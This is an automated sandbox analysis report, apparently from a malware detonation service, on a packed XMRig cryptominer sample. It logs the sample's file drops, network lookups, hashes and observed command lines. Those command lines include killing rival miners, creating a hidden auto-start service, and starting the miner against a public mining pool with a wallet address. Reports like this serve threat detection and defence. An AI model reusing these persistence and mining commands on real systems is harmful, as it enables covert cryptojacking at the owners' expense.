Malware Analysis Report

2025-01-22 12:52

Sample ID 240520-mgkqtafc54
Target 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118
SHA256 1faff4cf4bfe0d40af1555dc2ca749c5a382197b51b327ad89c4734d6ba75ee3
Tags
xmrig evasion execution miner persistence vmprotect
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1faff4cf4bfe0d40af1555dc2ca749c5a382197b51b327ad89c4734d6ba75ee3

Threat Level: Known bad

The file 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

xmrig evasion execution miner persistence vmprotect

xmrig

XMRig Miner payload

Sets file to hidden

Creates new service(s)

Stops running service(s)

Loads dropped DLL

VMProtect packed file

Executes dropped EXE

Checks computer location settings

Deletes itself

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Runs net.exe

Kills process with taskkill

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-20 10:26

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-20 10:26

Reported

2024-05-20 10:28

Platform

win10v2004-20240426-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\WINDOWS\Debug\wkde\mscorsvw.exe N/A
N/A N/A C:\WINDOWS\Debug\wkde\svchost.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\debug\wkde C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\Windows\debug\wkde\mscorsvw.ini C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File created C:\Windows\debug\wkde\svchost.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\Windows\debug\wkde\svchost.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.exe C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.ini C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Windows\debug\__tmp_rar_sfx_access_check_240601796 C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File created C:\Windows\debug\wkde\mscorsvw.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.log C:\WINDOWS\Debug\wkde\mscorsvw.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\svchost.exe C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Windows\debug\wkde\mscorsvw.ini C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File created C:\Windows\debug\wkde\wk.bat C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\Windows\debug\wkde\wk.bat C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.log C:\Windows\SysWOW64\attrib.exe N/A
File created C:\WINDOWS\Debug\wkde\mscorsvw.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\Windows\debug\wkde\mscorsvw.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A

Enumerates physical storage devices

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeLockMemoryPrivilege N/A C:\WINDOWS\Debug\wkde\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1376 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1376 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1376 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 4320 wrote to memory of 940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 1352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 1352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 1352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 1280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 1280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 1280 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 3560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 3560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 3560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 3944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 3944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 3944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4320 wrote to memory of 4896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 2268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 2268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 2268 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 3844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 3844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 3844 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 544 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4284 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4376 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4376 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4376 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4320 wrote to memory of 4508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4320 wrote to memory of 4508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4320 wrote to memory of 4508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 4508 wrote to memory of 4144 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4508 wrote to memory of 4144 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4508 wrote to memory of 4144 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4320 wrote to memory of 1236 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4320 wrote to memory of 1236 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4320 wrote to memory of 1236 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4320 wrote to memory of 3220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\WINDOWS\Debug\wkde\wk.bat" "

C:\Windows\SysWOW64\sc.exe

sc delete Systemss

C:\Windows\SysWOW64\sc.exe

sc delete WMIserver

C:\Windows\SysWOW64\sc.exe

sc delete WMIservers

C:\Windows\SysWOW64\sc.exe

sc delete WMI

C:\Windows\SysWOW64\sc.exe

sc delete Serv

C:\Windows\SysWOW64\sc.exe

sc delete system_update

C:\Windows\SysWOW64\sc.exe

sc delete system_updatea

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im spoolsvs.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im taskhost.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im NsCpuapl.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im MSASCui.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im nheqminer_zcash.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im nssm.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im update.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im server.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im sppscv.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im taskhost.exe

C:\Windows\SysWOW64\net.exe

net stop wkde

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wkde

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\taskkill.exe

taskkill /im mscorsvw.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im WUDFHost.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im nheqminer.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im NsCpuCNMiner32.exe /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /im NsCpuCNMiner64.exe /f

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Windows\SysWOW64\sc.exe

sc create wkde binPath= C:\WINDOWS\Debug\wkde\mscorsvw.exe start= auto

C:\Windows\SysWOW64\net.exe

net start wkde

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start wkde

C:\WINDOWS\Debug\wkde\mscorsvw.exe

C:\WINDOWS\Debug\wkde\mscorsvw.exe

C:\WINDOWS\Debug\wkde\svchost.exe

C:\WINDOWS\Debug\wkde\svchost.exe -o pool.minexmr.com:5555 -u 42NQYEALh7aC85Q376QpbJauGPfLLHUr3ZQCctLDEWQE3gWQUqfuDGg3vavPEB5edtGbtCHFTs6UJfZtHd2fVGAzHLwXmuN -p x -k --donate-level=1%

C:\Windows\SysWOW64\attrib.exe

attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.exe

C:\Windows\SysWOW64\attrib.exe

attrib +s +h C:\WINDOWS\Debug\wkde\svchost.exe

C:\Windows\SysWOW64\attrib.exe

attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.ini

C:\Windows\SysWOW64\attrib.exe

attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.log

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 16.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.88:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.61.62.23.in-addr.arpa udp
NL 23.62.61.88:443 www.bing.com tcp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 130.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 pool.minexmr.com udp
US 8.8.8.8:53 136.71.105.51.in-addr.arpa udp
US 8.8.8.8:53 pool.minexmr.com udp

Files

C:\WINDOWS\Debug\wkde\wk.bat

MD5 816d97b2dca2af96209ef913291d59be
SHA1 a3c480a7e333a1623e7cd8194d68468397c3f6d1
SHA256 ccf0010fcc0783096c0323c3bbe6a88a4d969c8b327626d1eb5b493e03a8e54d
SHA512 54bbff4724a8b2065273f118aa1eeb61542df82fc853e01155470053b8f18cd9e1c0f8618c077dab13767e187f93653842a8df852496e5bdf7e2dd7fc0120088

C:\Windows\debug\wkde\mscorsvw.exe

MD5 cbb4ca806e69a4880dd02e04e5bce18b
SHA1 1e838ddad7b04a1f2be935f6fe8e7cff3466c4d7
SHA256 2cadd79540acdfcc6d99875a79ed7c35fd3508e5ba6c29c9caae598fcc40b79b
SHA512 6240fcdf8899c8d62357ad4cfe4c749517fa91c81d8765f2e1b3e23fdf95cdde09f8954da5b5f0ef1e0fa7e34d88e5dd7070134eefc40f98a6b6264f18a295a6

memory/1648-13-0x0000000000400000-0x000000000055E000-memory.dmp

C:\WINDOWS\Debug\wkde\mscorsvw.ini

MD5 d298cd48c88433017ef4e66af740830e
SHA1 e0ef455dc4df16948d85c5a058d0980ce5020822
SHA256 b22ef4711432e08a93b9ef241616e51f17744a762e47b1d871aeabb6d4ae5d89
SHA512 5927b46c620a5b91b072ac48d7c5f2a98eff1984c8b82ae636512ebcfbb1a9d3b122f4cae81c802da4a81b0c5ee3143a931eaf42844226b7ea6aeaeceb12b8fe

memory/1648-14-0x0000000000400000-0x000000000055E000-memory.dmp

C:\Windows\debug\wkde\svchost.exe

MD5 79a1ec8d32e8e3032b5f5126c11f2216
SHA1 86dc55fcdc358a5c6699c41582b66b75bedc4086
SHA256 d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8
SHA512 a80fa204f05a5be209a945af9c5f8e6773c338a3cb5bd526c29e78932ed04d2c625dcb3fe5e918b07b316ba6981bb517714ad524a37f73f6055600ae1c145106

C:\WINDOWS\Debug\wkde\mscorsvw.log

MD5 0a98d172405546d83c748505a590f268
SHA1 0a107d99277cc976260d59d60ea2e513a5280688
SHA256 cb4075e76b795f5a464a50114628b2d62e3546aa9735a0ebffef29b3e94bdcac
SHA512 89c091858c44cd0055a33de6fd89b20f0735bdb071f03158b76ae312af8901827f3fd26c3c7f12cfe777e42f1d4f7874da30770b3ebcb4fadd79543d100af0ef

memory/4040-24-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/4040-25-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/1648-26-0x0000000000400000-0x000000000055E000-memory.dmp

memory/4040-27-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/4040-28-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/4040-29-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/4040-30-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/4040-31-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/4040-32-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/4040-33-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/4040-34-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/4040-35-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/4040-36-0x0000000000400000-0x00000000004B5000-memory.dmp

memory/4040-37-0x0000000000400000-0x00000000004B5000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-20 10:26

Reported

2024-05-20 10:28

Platform

win7-20240220-en

Max time kernel

148s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Stops running service(s)

evasion execution

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\WINDOWS\Debug\wkde\mscorsvw.exe N/A
N/A N/A C:\WINDOWS\Debug\wkde\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\WINDOWS\Debug\wkde\mscorsvw.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.exe C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.log C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Windows\debug\wkde\mscorsvw.ini C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File created C:\Windows\debug\wkde\svchost.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\Windows\debug\wkde\svchost.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File created C:\Windows\debug\wkde\wk.bat C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\Windows\debug\wkde\wk.bat C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.ini C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Windows\debug\__tmp_rar_sfx_access_check_259395217 C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File created C:\Windows\debug\wkde\mscorsvw.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File created C:\WINDOWS\Debug\wkde\mscorsvw.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\Windows\debug\wkde\mscorsvw.ini C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\mscorsvw.log C:\WINDOWS\Debug\wkde\mscorsvw.exe N/A
File opened for modification C:\Windows\debug\wkde C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\Windows\debug\wkde\mscorsvw.exe C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe N/A
File opened for modification C:\WINDOWS\Debug\wkde\svchost.exe C:\Windows\SysWOW64\attrib.exe N/A

Enumerates physical storage devices

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
